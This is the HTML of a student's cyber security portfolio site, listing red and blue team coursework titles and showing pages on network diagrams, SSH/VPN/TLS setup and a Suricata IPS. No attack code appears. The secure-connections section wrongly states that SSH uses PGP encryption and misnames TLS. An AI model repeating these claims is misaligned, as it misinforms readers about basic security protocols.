          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Red teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal8">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/08-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">SQL injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal9">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/09-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Command injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal10">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/10-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site scripting</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal11">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/11-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site request forgery</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal12">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/12-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Path traversal</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal13">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/13-thumbnail.jpeg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Password cracking</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal14">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/14-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network scanning and enumeration</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal15">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/15-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network sniffing and spoofing</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal16">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/16-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Law, Ethics and Responsible Disclosure</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal17">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/17-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Basic hacking process</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
           <a class="portfolio-link" data-toggle="modal" href="#portfolioModal18">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/18-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Self reflection</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Internship</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal19">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/internship/19-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S5</h4>
          <p class="text-muted">My internship</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Minor</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Red teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal20">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/20-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pentesting methods</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal21">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Linux write-up</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal22">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
           <p class="text-muted">HTB Windows write-up</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal23">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/23-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal24">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis session</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal25">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/25-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Personal pen-test toolbox</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal26">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/26-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security of IOT protocols and technology</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal27">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/27-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pen-test at COMPANY_NAME_HERE</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal28">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a smartphone app</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal29">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a website</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal30">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a device</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal31">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Organize a weekly Hack The Box event</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Blue teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal32">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/32-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal33">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">IDS technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal34">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/34-thumbnail.svg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Monitoring technologies</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal35">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/35-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">SIEM technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal36">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/36-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Threat use cases</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal37">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Developing and tuning an IDS</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal38">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/38-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Setting up a SOC</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal39">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/39-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability scanning</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal40">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/40-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security monitoring, analysis and triage</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Forensics specialisation</h5>
          </div>
          </div>
          </div>
          </section>
          
          <section id="about">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About</h2>
          <h3 class="section-subheading text-muted">My cyber security career.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <ul class="timeline">
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/1.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S3 2019</h4>
          <h4 class="subheading">The beginning</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was the first time I got experienced the cyber security stream and what it had to offer. I learned the basics of the defensive side of cyber security.</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/2.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S4 2020</h4>
          <h4 class="subheading">Round 2</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was my second semester on cyber security this time focusing on the offensive side.</p>
          </div>
          </div>
          </li>
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/3.png" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S5 2021</h4>
          <h4 class="subheading">The internship</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
           </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/4.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S7 2021</h4>
          <h4 class="subheading">My minor</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          
          <li class="timeline-inverted">
          <div class="timeline-image">
          <h4>The
          <br>Future
          </h4>
          </div>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="team">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About me</h2>
          <h3 class="section-subheading text-muted">Some additional links and information.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-sm-4">
          
          </div>
          <div class="col-sm-4">
          <div class="team-member">
          <img class="mx-auto rounded-circle" src="img/team/Pim.jpg" alt="">
          <h4>Pim Beekmans</h4>
          <p class="text-muted">Student</p>
          <ul class="list-inline social-buttons">
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-twitter"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-facebook-f"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="https://www.linkedin.com/in/pim-beekmans/?originalSubdomain=nl">
          <i class="fab fa-linkedin-in"></i>
          </a>
          </li>
          </ul>
          </div>
          </div>
          <div class="col-sm-4">
          
          </div>
          <div class="row">
          <div class="col-lg-8 mx-auto text-center">
          <p class="large text-muted">This is me, thank you for reading, hopefully you've liked my portfolio on cyber security. For additional feedback feel free to send an email to <a href="/cdn-cgi/l/email-protection#09796064496b6c6c626468677a276d6c7f"><span class="__cf_email__" data-cfemail="e191888ca18384848a8c808f92cf858497">[email&#160;protected]</span></a>.</p>
          </div>
          </div>
          </div>
          </div>
          </section>
          
          <section class="py-5">
          <div class="container">
          <div class="row">
          
          </div>
          </div>
          </section>
          
          <section id="contact">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Contact Me</h2>
          <br>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <form id="contactForm" name="sentMessage" novalidate="novalidate">
          <div class="row">
          <div class="col-md-6">
          <div class="form-group">
          <input class="form-control" id="name" type="text" placeholder="Your Name *" required="required" data-validation-required-message="Please enter your name.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="email" type="email" placeholder="Your Email *" required="required" data-validation-required-message="Please enter your email address.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="phone" type="tel" placeholder="Your Phone *" required="required" data-validation-required-message="Please enter your phone number.">
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="col-md-6">
          <div class="form-group">
          <textarea class="form-control" id="message" placeholder="Your Message *" required="required" data-validation-required-message="Please enter a message."></textarea>
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="clearfix"></div>
          <div class="col-lg-12 text-center">
          <div id="success"></div>
          <button id="sendMessageButton" class="btn btn-primary btn-xl text-uppercase" type="submit">Send Message</button>
          </div>
          </div>
          </form>
          </div>
          </div>
          </div>
          </section>
          
          <footer>
          <div class="container">
          <div class="row">
          <div class="col-md-4">
          <span class="copyright">Copyright &copy; Beekmans.dev 2019</span>
          </div>
          <div class="col-md-4">
          
          </div>
          <div class="col-md-4">
          <ul class="list-inline quicklinks">
          <li class="list-inline-item">
          <a href="#">Privacy Policy</a>
          </li>
          <li class="list-inline-item">
          <a href="#">Terms of Use</a>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </footer>
          
          
          <div class="portfolio-modal modal fade" id="portfolioModal1" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Self Assessment</h2>
          <p class="item-intro text-muted">Week 1</p>
          <p>
          <ol>
          <li>What did you like / or find easy?</li>
          <li>What did you find difficult? At what point did it get too difficult for now?</li>
          <li>
          Then check the list of learning subjects for the basic knowledge assignment and
          possibilities and requirements for the project.
          <ul>
          <li>What subjects do you already know and what is unknown terrain for you?</li>
          </ul>
          </li>
          <li>What parts of the current semester would you like to give much attention?</li>
          <li>What do you want to achieve and learn in particular?</li>
          <li>Which study style and corresponding planning is most suitable for you?</li>
          <li>What would you like to do or achieve in the project? (subjects, type of project,
          domain to work in, learning goals, etc.)
          </li>
          </ol>
          <br>
          Answers:
          <br>
          <ol>
          <li>I like working with servers and playing with my network at home and virtual
          machines. I think I find basic networking the easiest.
          </li>
          <li>Advanced networking all knowledge that I know is self-taught so I think there is a
          lot I don’t know yet. I got stuck on virtual lans and ip routing at home what else
          I’ll find difficult is what I need to find out in the distant future.
          </li>
          <li>
          Subjects:
          <div class="container">
          <div class="row">
          <div class="col-sm-4">
          <ul>
          Used:
          <li>VMWare</li>
          <li>Linux</li>
          <li>IPv4</li>
          <li>NAT</li>
          <li>TCP/IP</li>
          <li>DNS</li>
          <li>HTTP</li>
          <li>FTP</li>
          <li>Firewalls</li>
          <li>HTTPS</li>
          <li>VPN</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Know about but never used:
          <li>VMWare ESX</li>
          <li>Wireshark</li>
          <li>ARP</li>
          <li>IP routing</li>
          <li>SMTP</li>
          <li>IDS</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Never heard about it:
          <li>Seclab</li>
          <li>ICMP ping</li>
          <li>CIA and IT Risk analysis</li>
          </ul>
          </div>
          </div>
          </div>
          </li>
          <li>Advanced networking and the transition to Java.</li>
          <li>How to be a good Cyber security expert.</li>
          <li>Style 2, I’ll try to find out if this is the most suitable for me and maybe go to
          the style 3 courses on the days I get subjects I already know.
          </li>
          <li>I don’t really have a preference I want to learn as much as possible related to
          cyber security.
          </li>
          </ol>
          </p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Self assessment</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal2" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagram.png" alt="">
          <p>This network diagram shows 3 main VLAN's containing a employee environment for the
          employees to work on, a guest environment for the people visiting the company as guests
          and a DMZ for the servers and services to the outside world.</p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal3" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram V2</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagramV2.png" alt="">
          <p>This is the second version of my network diagram. I changed a few things to match
          Casper's feedback. The first thing I changed are the firewalls, I only needed to address
          the physical firewall and not the ones for every single interface. The last thing was I
          added the corresponding IP ranges and subnets to each VLAN.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal4" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Secure connections</p>
          <a href="../../img/portfolio/blue/sshAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sshAccess.png" alt=""></a>
          <p>Here you can see that I made a SSH connection to my Ubuntu webserver. I use Putty as my
          SSH terminal. SSH is encrypted using PGP (Pretty good privacy) which uses a public and a
          private key to communicate with each other. This is especially helpful because you don't
          need to transfer passwords to encrypt the connection. The sending client encrypts its
          message using the public key from the recipient and the recipient decrypts the message
          using its own private key. This works the same the other way around. I can use this
          technique to remotely manage my webservers without the need physical access.</p>
          <a href="../../img/portfolio/blue/vpnAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/vpnAccess.png" alt=""></a>
          <p>Here you can see that I'm connected to a VPN. This VPN is OpenVPN and runs on the PfSense
          router. It gives me access to the subnets I gave it access to and with this I can
          remotely manage my whole network, with being actually physically connected to the
          network. The OpenVPN connection is encrypted be TLS (Transfer layer security) which is
          successor from SSL. TLS uses a handshake at the start of the connection where a key is
          shared between the 2 clients. This key will be used for the symmetric encryption of the
          messages. The authenticity of the connection is secured by a certificate and the public
          key of the webserver this prevents possible man in the middle attacks, where someone
          will pretend to be another website for example.</p>
          <a href="../../img/portfolio/blue/sslConnection.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sslConnection.png" alt=""></a>
          <p>Here you can see the ssl certificate I created for the website that is running my
          portfolio. I created the script using certbot in Ubuntu and the CA is Let's encrypt
          authority x3. The website automatically forces all traffic to https, the website is
          still accessible by http but will redirect the user to https.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Secure connections</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal5" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IDS/IPS</p>
          <P>I implemented Suricata as my IPS, I thought it would be the best option because they say
          it's more advanced and newer. Below you can see some prove of the implementation and
          some results I came across.</P>
          <a href="../../img/portfolio/blue/Suricata1.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata1.png" alt=""></a>
          <p>I configured the IPS to monitor the WAN and LAN interface for now but I'm planning to
          configure it to the Employee VLAN as well. This will protect the company for any
          potential threats from the inside.</p>
          <a href="../../img/portfolio/blue/Suricata2.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata2.png" alt=""></a>
